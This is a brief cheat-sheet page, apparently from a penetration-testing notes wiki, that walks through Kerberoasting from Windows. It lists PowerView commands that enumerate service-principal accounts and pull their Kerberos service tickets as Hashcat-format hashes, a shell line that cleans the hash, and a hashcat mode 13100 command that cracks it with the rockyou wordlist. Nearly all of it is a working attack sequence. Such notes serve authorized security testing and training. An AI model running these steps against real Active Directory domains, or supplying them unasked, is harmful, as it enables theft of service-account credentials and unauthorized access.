Kerberoasting from windows

We can use tools like PowerView.ps1 or Rubeus.exe

PS C:\> Import-Module .\PowerView.ps1
PS C:\> Get-DomainUser * -spn | select samaccountname

samaccountname
--------------
backupagent

Then we can dump the hash for a specific account.

Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

Also if your hash has some weird new lines or space use can fix using this

$ cat hash.txt | sed 's/ //g' | tr -d \\n

hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

Last updated 1 year ago